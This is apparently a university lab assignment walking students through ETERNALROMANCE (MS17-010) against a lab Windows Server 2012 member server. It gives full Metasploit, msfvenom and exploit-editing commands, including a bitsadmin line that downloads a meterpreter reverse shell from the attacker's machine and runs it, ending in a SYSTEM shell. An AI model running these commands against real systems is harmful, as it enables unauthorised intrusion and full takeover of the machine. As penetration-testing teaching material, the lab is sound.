Proj 16x: ETERNALROMANCE v. 2012 Member Server (15 pts. extra credit)

What You Need for this Project

Purpose

To exploit the member server, so we can then practice pivoting and exploiting a domain controller, in a later project.

Start your Domain Controller

Start the Domain Controller you made in the previous project.

Start the Member Server

Start your Member Server.

Log in as

Preparing your Windows Target: File Sharing

On your Member Server, click Start and type SHARING

Open "Network and Sharing Center".

On the left side, click "Advanced Sharing Options".

In the "Domain (current profile)" section, turn on these options, as shown below:

In the "All Networks" section, turn on this option, as shown below:

Click "Save changes".

Preparing your Windows Target: Activating the Guest Account

On your Member Server, at the lower left of the desktop, right-click the third icon. Click "Run as Administrator", as shown below.

A User Account Control box pops up. Click Yes.

In the Administrator PowerShell window, execute this command:

net user guest /active:yes
The command succeeds, as shown below.

Turning Off Windows Defender

Click Start. Type DEFEN

Click "Windows Defender Settings".

Turn off "Real-Time Protection", as shown below.

Finding the Target IP Address

On the Windows target, in PowerShell, execute the IPCONFIG command.

Note the target's IP address.

Enumerating Named Pipes

Named pipes are an inter-process communications system used by Windows, and ETERNLROMANCE exploits them. So first, we need to find the available named pipes on the target.

On Kali, in a Terminal window, execute these commands, one at a time.

Replace the IP address with the IP address of your Windows target.

msfconsole
use auxiliary/scanner/smb/pipe_auditor 
show info
set RHOSTS 172.16.1.202
exploit
A list of pipes appears, including netlogon, as shown below.

Exploiting the Target with ETERNALROMANCE

On Kali, in a Terminal window, execute these commands to download the exploit (into a file named 42315), download a Python library it needs, and run it:
wget https://www.exploit-db.com/download/42315
wget https://github.com/worawit/MS17-010/raw/master/mysmb.py
python 42315
It runs, as shown below, asking for <ip> and [pipe_name].

We need to put the username into the exploit file.

On Kali, in a Terminal window, execute this command:

nano 42315
Scroll down a page to find the USERNAME line. Insert the username GUEST as shown below.

Press Ctrl+X, Y, Enter to save the file.

On Kali, in a Terminal window, execute this command to exploit the target, replacing the IP address with the IP address of your Windows target:

python 42315 172.16.1.202 netlogon
The exploit runs as shown below, ending with the message "creating file c:\pwned.txt on the target".

To see if it worked, on the Windows target, at the lower left of the desktop, click the fourth icon to open Windows Explorer.

Navigate to C:. The pwned file should be visible, as shown below.

Saving the Screen Image

Make sure you can see the pwned file, as shown above.

Save a FULL DESKTOP image with the filename Proj 15xa from Your Name.

Creating Meterpreter Malware

In Kali, execute these commands to create a malicious Windows executable file named "shell-service.exe" and serve it from a malicious Web server. It's an executable designed to run as a service.

Adjust the IP address to match the IP address of your Kali machine (the C&C server). This shell will use the default port of 4444.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.1.188 -f exe-service > /var/www/html/shell-service.exe
service apache2 start

Start a Metasploit Handler

In Kali, open a new Terminal window and execute these commands to start a C&C listener.
msfconsole
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
exploit
The listener starts, as shown below.

Inserting the Command Line

On Kali, in a Terminal window, execute this command to copy the exploit to a file named romance.py and edit it.
cp 42315 romance.py
nano romance.py
In nano, press Ctrl+W to search. Enter a search string of pwned

Press Enter.

Nano finds the string. As before, we will modify the line beginning with "service_exec", highlighted in the image below.

In that line, carefully delete the text between the single quotes, as shown below.

Insert this line between the single quotes, as shown below. Replace the IP address with the IP address of your Kali machine.

cmd /c bitsadmin /transfer wcb /priority high http://172.16.1.188/shell-service.exe C:\shell-service.exe &&  C:\shell-service.exe

Save the file with Ctrl+X, Y, Enter.

Exploiting the Target Again

On Kali, in a Terminal window, execute this command to exploit the target, replacing the IP address with the IP address of your Windows target:
python romance.py 172.16.1.202 netlogon
The exploit runs as shown below.

The Meterpreter window shows a shell opening.

Execute these commands to interact with the shell and see who you are: you are SYSTEM, as shown below.

sessions -i 1
getuid
Execute these commands to list available tokens. One of them is HACKME\Sally, as shown below.
use incognito
list_tokens -u

Saving the Screen Image

Make sure you can see that one of the "Delegation Tokens" is HACKME\Sally, as shown above.

Save a FULL DESKTOP image with the filename Proj 16xb from Your Name.

Turning in Your Project

Send the images as email attachments to cnit.124@gmail.com with a Subject line of Proj 16x from Your Name.

References

HOW TO EXPLOIT ETERNALROMANCE/SYNERGY TO GET A METERPRETER SESSION ON WINDOWS SERVER 2016
A regsvr32 hack is all it takes to bypass Windows' AppLocker security

Posted 9-27-17 by Sam Bowne
Added Windows Defender portion 10-5-17